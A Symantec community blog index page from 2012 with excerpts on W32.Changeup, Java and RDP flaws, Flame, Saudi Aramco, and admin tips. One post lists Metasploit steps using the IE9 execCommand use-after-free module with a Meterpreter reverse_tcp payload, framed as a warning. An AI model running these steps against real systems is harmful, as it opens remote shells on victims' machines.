Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts tagged with 11.x
Showing posts in English
Brandon Noble | 30 Nov 2012 | 15 comments

In mid-2009, W32.Changeup, was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created.  Since November 2012 we have seen weekly spikes the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.

When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even more malware...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2


- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.


Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
ABN | 22 Aug 2012 | 1 comment

Hello Gents,

We normally do come across the scenario of Live update affecting our ususal work of, being a Symantec administrator. Scenarios like

  1. Clients do not have the ability to launch liveupate even though policy is been set to do so. Or vice versa.
  1. Low disk space causing SEP not to update on critical serves. Definition is stored only on the OS drive were space is a major concern.

By default the SEP definitions will be stored in the Operating System drive even if we install it in a different partition.

With the following process we can configure the Liveupdate settings, the number of revision that is kept on the SEP (client) and also change the location on where it is stored.

I )   To enable Liveupdate on the SEP.

    From SEPM:

Mohammad Altaf Khan | 15 Aug 2012 | 1 comment

(Reuters) - Saudi Arabian Oil Co (Saudi Aramco) SDABO.UL said its computer systems had been shut down by a virus late on Wednesday, but it added that production had not been affected.

"An official source of Saudi Aramco confirmed that it had isolated electronic systems for the entire company today and cut off external access as an early precaution," said a statement in Arabic from the company.

The world's biggest oil company said that although the virus affected some computers, it did not penetrate key components of the network, which it said would return to normal operating mode soon.

"The source ... reiterated the lack of any effect at all on the work of production due to the strength of advanced protection systems," the statement added.

Rumours had spread among traders earlier on Wednesday that the state-owned company had been subjected to a hacking attack.

(Reporting By Reem Shamseddine and Angus McDowall; Editing by...

AR Sharma | 28 May 2012 | 5 comments

Just now 'The Flame', the most powerful malware till date has been identified. Again, we must say that calling 'The Flame' a malware is insult for 'The Flame'.

When security community can call Stuxnet- the first cyber weapon, then 'The Flame' should be called as first nuclear cyber weapon.

'Flame' is the 20 times more complex than Stuxnet. Antivirus companies took 6 months to analyze Stuxnet. Imagine how much time and effort would be required to analyze 'The Flame'

'Flame' is massive and most likely targeted for Iran and Isreal.

Once the PC is infected with 'Flame', it steals all info including password, traffic, image, audio and keystrokes.

In the group of malware, 'Flame' joins the elite club along with Stuxnet and Duqu.

'Flame' is the sophisticated attack toolkit. When fully deployed, it's over 20 Mb in size. Such a huge size is due to many different...

Chetan Savade | 15 May 2012 | 0 comments

Hello Everyone,

Tips to improve performance, speed & security.

5 tips for PC health: Organize your folders, update Windows, run antivirus software

Working on a slow, disorganized computer can be frustrating. Read on for organization tips and guidelines to keep your PC on the right track using tools built in to the Windows operating system.

1. Organize your folders

2. Clean up your hard disk

3. Use System Restore

4. Keep Windows and Microsoft Office up-to-date

5. Run antivirus software and a spyware detection and removal tool

Reference :

Speed up your PC

A badly fragmented hard drive will bring even a top-of-the-line new computer to a grinding halt. Learn how a preventive maintenance plan can keep your Windows PC running smoothly and swiftly.


Sushanta | 03 May 2012 | 0 comments


I want to implement Split Tunneling for VPN Users in my Enterprise. While I do that I do want to have a restricted policy for the VPN users when they are off network and connected remotely. At the same time I do want to have the same policy applied to the users when they are on the network directly from office location.

Please suggest me the best practices. If anybody has implemented in any of their companies. Please help.



Sumit G | 21 Apr 2012 | 0 comments

SmcService is not getting Start up(For Window - XP).


Window could not start the “Symantec Management Client” Service.


When try to startup the service. Error Display on screen (Error 1053: The service did not respond to the start or control request in timely fashion)


This problem is occurring due to some Symantec service effect.


  • Go to Run
  • Open the Services.msc.
  • Under the Services. Double click on “Symantec Management Client”.
  • Go to Logon Tab.
  • Uncheck the “Allow service to interact with desktop”.
  • Then Apply.
  • Go to General Tab and Start the...
AR Sharma | 15 Mar 2012 | 1 comment

Recently, major vulnerabilities in Microsoft remote desktop protocol (RDP) is identified and patch by Microsoft is released. These vulnerabilities are categorized as 'critical' by all security forums. All organizations, whether small, medium or large are sensitized and working on patch deployment and/or workaround for fixing the same.

Patch deployment (especially in desktops) is a substantial activity. This may take days or even weeks or more to get completed.

So, the question arises that- what to do to immediately re-mediate the threat while keeping the business as usual? Answer lies in the fact that how to identify the users using RDP and patching those users' machine on priority. And rest all machines can be taken care of in due course.

There could be many workaround. One of them could be using SEP host based firewall. Using SEP host based firewall policy, incoming RDP connection can be blocked. This policy can be applied to all clients in almost...